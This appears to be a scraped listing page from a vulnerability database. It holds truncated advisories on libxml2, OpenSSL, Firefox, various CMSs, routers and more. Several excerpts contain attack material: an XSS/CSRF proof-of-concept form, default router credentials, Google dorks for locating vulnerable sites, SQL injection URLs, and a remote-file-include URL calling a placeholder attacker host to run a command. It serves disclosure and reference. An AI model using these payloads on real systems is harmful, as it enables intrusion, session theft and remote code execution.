libxml XML entity name heap buffer overflow vulnerability
BUGTRAQ ID: 31126 CVE ID: CVE-2008-3529 CNCVE ID: CNCVE-20083529 The libxml package provides a function library that lets users manipulate XML files, including support for reading, modifying and writing XML and HTML files. libxml has a problem handling malformed XML content; a remote attacker can exploit the vulnerability to carry out a denial-of-service attack against the application. A heap-based buffer overflow exists when libxml2 processes an over-long XML entity name; if an application linked against libxml2 processes untrusted malformed XML content, this can lead to an application crash or arbitrary code execution. XMLSoft Libxml2 2.6.31 XMLSoft Libxml2 2.6.30 XMLSoft Libxm...
DedeCms V5.1 tag.php injection vulnerability
Dedecms is a fairly widely used PHP site-wide system, and as it is used its security also draws attention. The tag.php file in the directory handles the variable $tag improperly, which leads to an injection vulnerability. Because “'” can be used, if conditions allow, into file can be used directly to obtain a SHELL. DedeCms V5.1 sp1 None yet www.dedecms.com http://www.sebug.net/bbs/thread-332-1-1.html...
CA ARCserve Backup caloggerd and xdr function directory traversal and stack overflow vulnerabilities
BUGTRAQ ID: 29283 CVECAN ID: CVE-2008-2241, CVE-2008-2242 BrightStor ARCserve Backup provides backup and restore protection for servers on a variety of platforms. The caloggerd logging daemon of ARCserve Backup lacks checks on the supplied path when processing log messages; if an attacker appends malicious data to a file, this can lead to a directory traversal attack when the log is generated. If an over-long argument is passed to the xdrrwsstring library function of ARCserve Backup, a stack overflow can be triggered, leading to execution of arbitrary instructions. Computer Associates Server Protection r...
Linksys WRT54G (firmware 1.00.9) Security Bypass Vulnerabilities
No description provided by source. regurgitated by: meathive url: kinqpinz.info ; Tue, 05 Feb 2008 07:51:41 -0700 CVE-2008-1247 WRT54G firmware version: v1.00.9 Default LAN IP: 192.168.1.1 Default auth: user:blank - pass:admin Authorization: Basic OmFkbWlu php: print base64_decode("OmFkbWlu"); // :admin...
Info-ZIP UnZip inflate_dynamic() function heap corruption vulnerability
BUGTRAQ ID: 28288 CVECAN ID: CVE-2008-0888 unzip is a tool for decompressing the .zip file format under Unix. A vulnerability exists in the implementation of unzip; an attacker may exploit it to elevate privileges by enticing a user to process a malicious document....
Mozilla Thunderbird/Seamonkey/Firefox 2.0.0.12 fixes multiple security vulnerabilities
BUGTRAQ ID: 27683 CVECAN ID: CVE-2008-0412,CVE-2008-0413,CVE-2008-0414,CVE-2008-0415,CVE-2008-0417,CVE-2008-0419,CVE-2008-0591,CVE-2008-0592,CVE-2008-0593,CVE-2008-0594 Firefox/Thunderbird/SeaMonkey are the web browser and mail/newsgroup client released by Mozilla....
OpenSSL DTLS remote heap overflow vulnerability
BUGTRAQ ID: 26055 CVECAN ID: CVE-2007-4995 OpenSSL is an open-source SSL implementation used to provide strong encryption for network communication, and it is now widely used in all kinds of network applications. A vulnerability exists in OpenSSL's DTLS support; an attacker can create a malicious client or server capable of triggering a heap overflow, leading to execution of arbitrary instructions. Note that this vulnerability only affects applications that use DTLS. OpenSSL Project OpenSSL 0.9.8f OpenSSL Project OpenSSL 0.9.8 RedHat Linux 5.0 OpenSSL Project ---------------...
WordPress MultiUser crossite scripting PoC
No description provided by source. <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/wp-newblog.php" method="post"> <input type="hidden" name="stage" value="1"> <input type="hidden" name="weblogid" value='"><script>alert(document.cookie)</script>'> </form> </body>...
Mozilla Firefox 2.0.0.4 multiple remote security vulnerabilities
BUGTRAQ ID: 24946 CVECAN ID: CVE-2007-3734,CVE-2007-3735,CVE-2007-3736,CVE-2007-3737,CVE-2007-3738 Mozilla Firefox is a popular open-source web browser. Multiple memory corruption vulnerabilities exist in Firefox's browser engine and JavaScript engine, which may allow an attacker to crash the browser. Vulnerabilities in the addEventListener and setTimeout methods may allow an attacker to break the browser's same-origin policy and inject script into other sites, accessing or modifying that site's confidential or sensitive data....
LiveCMS <= 3.4 (categoria.php cid) Remote SQL Injection Exploit
No description provided by source. #!/usr/bin/perl [ASCII-art banner] INFO: Program Title LiveCMS = 3.4 SQL Injection,&nbs...
Veritas NetBackup BPCD daemon multiple remote security vulnerabilities
Veritas NetBackup is a large-scale data backup application system. bpcd.exe in Veritas NetBackup has a stack overflow vulnerability when parsing over-long requests submitted to the NetBackup Master/Media Server; if the communication prefix sent to this process has a malformed length, the overflow is triggered, leading to execution of arbitrary instructions. bpcd.exe has another stack overflow when parsing over-long CONNECTOPTIONS requests submitted to the NetBackup Master/Media Server. During parsing, a copy operation is performed without a length check, leading to execution of arbitrary instructions....
Apple AirPort Extreme driver beacon frame denial of service vulnerability
The Apple Airport Extreme driver is a wireless driver for MacOS systems. The Apple Airport Extreme driver does not correctly handle some beacon frames; a remote attacker can exploit the vulnerability to carry out a denial-of-service attack against the system. No detailed vulnerability information is currently available. Apple Airport Extreme Driver http://www.apple.com/...
Xerox WorkCentre and WorkCentre Pro multiple security vulnerabilities
Xerox WorkCentre is a digital print/copy multifunction device. Multiple security vulnerabilities exist in the ESS/Network Controller and MicroServer Web Server code of Xerox WorkCentre, specifically: a command injection vulnerability in the TCP/IP username on the web user interface; a command injection vulnerability in the Scan-to-mailbox folder name field on the web user interface; a command injection vulnerability in the Microsoft Networking configuration parameters on the web user interface; browser permissions may allow unauthorized access; the TFTP/BOOTP auto-configuration option may allow unauthorized configuration settings; web service requests can be issued over HTTP rather than HTTPS;...
动力 (My Power) 3.51 Article_Print.asp injection vulnerability
www.com.com/ArticlePrint.asp?ArticleID= is not filtered; SQL query statements can be submitted, allowing the administrator username and password to be obtained. 动力 My Power 3.51. Download the latest official patch: http://www.asp163.net...
OWL Intranet Engine 0.82 (xrms_file_root) Code Execution Exploit
No description provided by source. #!/usr/bin/perl use IO::Socket; print "WwwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; print "WWwoLWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; print...
Attack on Pseudo-random number generator (PRNG) used in 1000 Guess, an Ethereum lottery game. (CVE-2018–12454)
Abstract An Ethereum lottery game, 1000 Guess, has a vulnerability that it generates random numbers predictable by anyone. This game decides a winner by a random number when the number of players who bet on the contract reaches to the predetermined number. The contract generates the random number...
semcms php v2.7 SQL injection
...
Claymore's Dual Ethereum Miner unauth stack buffer overflow(CVE-2017-16929)
VuNote =================== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16929 Version: 0.2 Date: Nov 30th, 2017 Tag: claymore dual ethereum decred crypto currency miner Overview -------- Name: Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner Vendor: nanopool/claymore...
Libarchive zip zip_read_mac_metadata Code Execution Vulnerability(CVE-2016-1541)
SUMMARY An exploitable heap overflow vulnerability exists in the zip archive decompression functionality of libarchive. A specially crafted zip file can cause memory corruption leading to code execution. An attacker can send a malformed file to trigger this vulnerability. TESTED VERSIONS libarchi...
Moxa AWK-3131A web_runScript Header Manipulation Denial of Service Vulnerability(CVE-2016-8726)
Summary An exploitable null pointer dereference vulnerability exists in the Web Application /forms/webrunScript iwfilename functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. An HTTP POST request with a blank line in the header will cause a segmentation fault in the web...
Invincea Dell Protected Workspace Protection Bypass(CVE-2016-8732)
Summary Multiple security flaws exist in InvProtectDrv.sys, which is a part of Invincea Dell Protected Workspace 5.1.1-22303. Weak restrictions on the driver communication channel and additional insufficient checks allow any application to turn off some of the protection mechanisms provided by the...
Adobe Acrobat Reader DC AcroForm PDFDocEncoding Remote Code Execution Vulnerability(CVE-2017-11263)
Summary An exploitable case of parser confusion can lead to invalid pointer arithmetic in the part of the code responsible for parsing AcroForm forms in Adobe Acrobat Reader DC 2017.009.20044. A specially crafted PDF file can abuse this unchecked pointer arithmetic to access and overwrite arbitrary...
Remote Exploitation of the NeoCoolcam IP Cameras and Gateway
Foreword The Internet of Connected Things has become a massive phenomenon during the past few years and will continue to grow at an incredible pace. More than 26 billion smart devices will be on the market by 2020, Gartner estimates. We’re looking at an explosive growth, as IoT opportunities...
Nexus 9 vs. Malicious Headphones, Take Two
Nexus 9 vs. Malicious Headphones, Take Two In March 2017 we disclosed CVE-2017-0510, a critical vulnerability in Nexus 9 that allowed for quite a unique attack by malicious headphones. Interestingly, its patch was insufficient. We had responsibly reported that finding, CVE-2017-0648, to Google,...
Apple iOS / MacOS Domain Socket Kernel Use-After-Free(CVE-2017-2501)
iOS/MacOS kernel uaf due to bad locking in unix domain socket file descriptor externalization unpexternalize is responsible for externalizing the file descriptors carried within a unix domain socket message. That means allocating new fd table entries in the receiver and recreating a file which...
Oracle PeopleSoft HCM 9.2 XXE Injection
Application: Oracle PeopleSoft Versions Affected: PeopleSoft HCM 9.2 on PeopleTools 8.55 Vendor URL: http://oracle.com Bug: XXE Reported: 23.12.2016 Vendor response: 24.12.2016 Date of Public Advisory: 18.04.2017 Reference: Oracle CPU April 2017 Author: Nadya Krivdyuk ERPScan Description 1...
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability(CVE-2016-7552)
Summary: There exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. This can result in an attacker causing a DoS or bypassing authentication. Exploitation: An attacker can use this vulnerability to bypass the authentication by...
Microsoft Windows Code injection vulnerability (DoubleAgent)
Overview We’d like to introduce a new Zero-Day technique for injecting code and maintaining persistency on a machine (i.e. auto-run), dubbed DoubleAgent. DoubleAgent can exploit: every Windows version (Windows XP to Windows 10), every Windows architecture (x86 and x64), every Windows user...
Grandstream HT701 IP analog telephone adapter background of the weak password vulnerability
No description provided by source. #!/usr/bin/env python # coding: utf-8 from pocsuite.api.request import req from pocsuite.api.poc import register from pocsuite.api.poc import Output, POCBase import re class TestPOC(POCBase): vulID = ''  # ssvid version = '1.0' author = 'Hcamael' vulDate = '2016-11-11'...
A stored XSS in Coremail
Brief description: escape is applied incorrectly in one place. Details: In the current code, the sender is constructed as follows: function getEmailDiv(emailAddress) return '' ... So what is escapeHTML? function ... var div = document.createElement("div"); var text = document.createTextNode(this); div.appendChild(text); return div.innerHTML; This filtering does not filter single or double quotes, so a specially constructed string can escape outside the double quotes. Proof of vulnerability: the simplest way to trigger it is via onmousexx...
Mallbuilder mall system change_status.php id parameter SQL injection vulnerability
No description provided by source...
wizBank® learning management system arbitrary file download vulnerability
The file download function of the wizBank learning management system does not strictly check and filter the name and type of the downloaded file, so a malicious user can download a specified file by constructing a special path. The source code of the wizBank learning management system file \www\cw\skin1\jsp\download.jsp is as follows: [code area] As can be seen from the code, the name and type of the downloaded file are not strictly checked and filtered, so a malicious user can download a specified file by constructing a special path....
TRS WCM parseXMLFile() function XXE vulnerability
No description provided by source...
Discuz Survey Professional Edition plugin orderby parameter SQL injection vulnerability
No description provided by source...
MetInfo5.3 /include/interface/uidata.php information disclosure
In MetInfo 5.3 the file /include/interface/uidata.php has an information disclosure problem. Because the template's backend has a function for recovering the administrator password, the mail password configured in the backend can be obtained through this page. Logging into the mail system then allows the password to be reset. require_once '../common.inc.php'; require_once ROOTPATH.'include/export.func.php'; // dump($_M['config']); $data['config'] = $_M['config']; // this $_M['config'] is the configuration data read from the database. echo json_encode($data); // printed out directly...
Mac OS X < 10.7.5, 10.8.2, 10.9.5 10.10.2 - rootpipe local privilege escalation vulnerability
Vulnerability name: Apple OS X Admin Framework security vulnerability. Severity: high. Vulnerability type: local privilege escalation. Details: Apple OS X is a proprietary operating system developed by the US company Apple for Mac computers. A security vulnerability exists in the XPC implementation of the Admin Framework in Apple OS X 10.10.2 and earlier. A local attacker can exploit this vulnerability to bypass authentication and obtain administrator privileges. PoC exploit code for rootpipe CVE-2015-1130 Created by Emil Kvarnhammar, TrueSec Tested on OS X 10.7.5, 10.8.2,...
TerraMaster NAS arbitrary file download vulnerability
No description provided by source...
一采通 e-procurement system multiple SQL injection vulnerabilities #2
Brief description: 一采通 e-procurement system multiple SQL injection vulnerabilities 2 Details: google:inurl:companycglist.aspx?ComId= 1. The vulnerability is in /Products/CategoryMSelect.aspx, parameter Name, for example http://eps.umgg.com.cn/Products/CategoryMSelect.aspx?Name=树脂磨盘 2. The vulnerability is in /RAT/Product/HistoryPrice.aspx, parameter kw, for example http://eps.umgg.com.cn/RAT/Product/HistoryPrice.aspx?kw=1 3. The vulnerability is in...
U-Mail v9.8.57 /getpass.php information disclosure vulnerability
No description provided by source...
PHP-Nuke 7.x Multiple Remote File Include Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/18186/info PHP-Nuke is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to include...
mIRC 6.1 DCC SEND Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/8818/info A vulnerability has been reported to exist in the mIRC client that may allow a remote attacker to crash a vulnerable mIRC client. The condition is most likely present due to insufficient boundary checking...
TWiki TWikiUsers Remote Arbitrary Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/14834/info A remote command execution vulnerability affects the application. The revision control function of the TWikiUsers script uses the backtick shell metacharacter to construct a command line. An attacker may use a...
Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability
No description provided by source. / Microsoft Windows DoS IcmpSendEcho2Ex interrupting Author: l3D Sites: http://nullbyte.org.il, http://forums.hacking.org.il IRC: irc://irc.nix.co.il/security Email: [email protected] Tested on Windows 7 Microsoft Windows operating system is prone to a local D...
RunCMS 1.1/1.2 NewBB_Plus and Messages Modules Multiple SQL Injection Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/14631/info RunCMS is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. Successful exploitation...
Contra Haber Sistemi 1.0 Haber.ASP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/21626/info Contra Haber Sistemi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...
Enthrallweb eClassifieds dircat.asp cid Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/21192/info eClassifieds is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to...
ES CmS 0.1 - SQL Injection Vulnerability
No description provided by source. ? Exploit Title: ES CmS 0.1 Sql Injection Vulnerability Google Dork: inurl:/page.php?id= Date: 2012 Exploit Author: MR.XpR Software Link: http://es-cms.com , http://sourceforge.net/projects/escms/files/esCMS Alpha/0.1/escmsalphav01.zip Version: v.0.1 Tested on: ...
Kaillera Multiple Clients Buffer Overflow Vulnerabilities
No description provided by source. #!/usr/bin/perl Exploit Title: Remote Buffer Overflows in Kaillera clients Date: 6/30/11 Author: sil3ntdre4m Software Link: Multiple: 1. Kaillera original client: An emulator to download with this client bundled with it is Project64K 0.13:...
Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7411/info A problem has been reported in Microsoft Windows. Due to improper bounds checking by the regedit.exe program, it may be possible for a local attacker to execute arbitrary code as another user. / 09/04/2003...
phpBazar <= 2.1.0 - Remote (Include/Auth Bypass) Vulnerabilities
No description provided by source. Title: phpBazar = 2.1.0 Multiple vulnerabilities URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password:...